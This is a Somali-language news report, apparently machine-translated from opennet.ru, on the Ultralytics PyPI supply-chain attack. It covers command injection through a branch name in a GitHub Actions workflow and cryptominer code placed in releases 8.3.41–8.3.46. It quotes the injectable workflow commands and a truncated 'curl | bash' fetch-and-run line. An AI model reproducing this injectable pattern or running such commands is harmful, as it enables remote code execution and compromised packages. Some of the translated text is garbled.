Weeraryahanadu waxa ay awoodeen in ay ku fuliyaan koodh leh GitHub Actions mudnaannada maamulaha ee kaydka maktabadda Ultralytics Python, kaas oo loo isticmaalo hawlaha aragga kombiyuutarka sida ogaanshaha shayga iyo qaybinta sawirka. Ka dib markii ay heleen kaydka, weerarradu waxay daabaceen dhowr cusub oo Ultralytics ah oo lagu sii daayo PyPI, oo ay ku jiraan wax ka beddelka xun ee macdanta cryptocurrency. Bishii la soo dhaafay, maktabadda Ultralytics ayaa laga soo dejiyay PyPI in ka badan 6.4 milyan jeer.
Si wax loogu dhimo kaydka, nuglaanta ayaa laga faa'iidaystay xirmada ficillada ultralytics, taas oo loo isticmaalo in si toos ah loo maamulo maamulayaasha marka ficilada qaarkood lagu sameeyo kaydka GitHub iyadoo la adeegsanayo habka GitHub Actions. Mashruuca ultralytics, maamulaha nugul wuxuu ku xidhnaa dhacdada pull_request_target oo wacay markii codsiyada jiidashada cusub la helo. Gaar ahaan, si loo qaabeeyo koodka codsiyada soo jiidashada soo socda, qaabeeyaha format.yml waa la wacay oo koodka lagu sheegay qaybta "orod" ee faylka action.yml waa la fuliyay. Xeerkani waxa uu ka kooban yahay amarada qolofka leh qaababka beddelka: git pull asal ${{ github.head_ref || github.ref }} git config --global user.name "${{ inputs.github_username}}" git config --global user.email "${{ inputs.github_email}}"
Markaa, magaca laanta Git ee lagu tixraacay codsiga jiidista ayaa lagu beddelay amarrada qolofka iyada oo aan si habboon loo baxsan. Waxaa mudan in la xuso in dayacanka la midka ah ee la xiriira isticmaalka qiimaha dibadda ee shaqada echo uu horayba ugu go'ay xirmada ultralytics-actions bishii Agoosto: echo "github.event.pull_request.head.ref: ${{github.event.pull_request.head.ref}}"
Si loo fuliyo koodkooda macnaha guud ee gacan ku haynta GitHub Actions, weeraryahanadu waxay codsi jiidis ah u direen kaydka ultralytics, iyagoo tilmaamaya magaca laanta: openimbot:$
Sidaas awgeed, markii codsi jiidis la helay, xadhigga "$(…)" ee ay qeexeen weeraryahannada ayaa la geliyey koodhka, kaas oo, ka dib fulinta ku xiga ee maamulaha, uu horseeday fulinta koodhka "curl -sSfL raw.githubusercontent.com/…/file.sh | bash".
Koodhka socodsiinta macnaha GitHub Actions waxa loo isticmaali karaa in lagu qabto calaamadihii gelitaanka kaydka iyo xogta kale ee xasaasiga ah. Ma cadda sida saxda ah ee ay weerarradu ugu suurtagashay in ay abuuraan sii-deynta, iyaga oo helaya awoodda ay ku fulinayaan koodkooda GitHub Actions. Waxaa la rumeysan yahay inay awoodeen inay sidaas sameeyaan iyagoo wax ka beddelaya maamulaha print.yml (Weerarayaashu waxay meesha ka saareen xaqiijinta koontada loo oggolaaday inay daabacdo sii-deynta PyPI) iyo iyagoo isticmaalaya GitHub Actions 'dhisidda farsamada sunta kaydinta si ay xogtooda u galiyaan siideynta.
Sii deynta ugu horreysay ee xaasidnimada leh ee Ultralytics 8.3.41 waxaa daabacay weeraryahannadii PyPI Diseembar 4 saacadda 23:51 PM (MSK) waxaana laga saaray 12:15 PM maalintii xigtay. 15:47 PM, siidayn kale, 8.3.42, ayaa la soo dhigay oo laga saaray 16:47 PM. Sidaa darteed, noocyada xaasidnimada leh ayaa la heli karay si loo soo dejiyo wadar ahaan qiyaastii 13 saacadood (PyPI waxay diiwaangelisaa qiyaastii 250 oo soo dejin ah oo maktabadda ultralytics ah maalintii). Siidayn 8.3.41 iyo 8.3.42 waxay ka koobnaayeen kood laga soo dejiyay meel dibadda ah. server Qaybta XMRig ee macdanta cryptocurrency.
Soosaarayaasha mashruuca ayaa xaliyay arinta waxayna siidaayeen siidaynta sixitaanka 8.3.43 iyo 8.3.44, laakiin laba maalmood kadib, weerar kale ayaa dhacay. Maanta, saacadu markay ahayd 04:41 AM iyo 05:27 AM (MSK), weeraryahanadu waxay sii daayeen laba sii dayn xaasidnimo oo dheeri ah — 8.3.45 iyo 8.3.46 — oo ay ku jiraan kood macdaneed oo kala duwan. Ilaa inta baaritaanku dhamaanayo, isticmaalayaasha waxaa lagula talinayaa inay joojiyaan ku rakibida noocyo cusub oo ay dejiyaan ku tiirsanaanta 8.3.44.
Source: opennet.ru
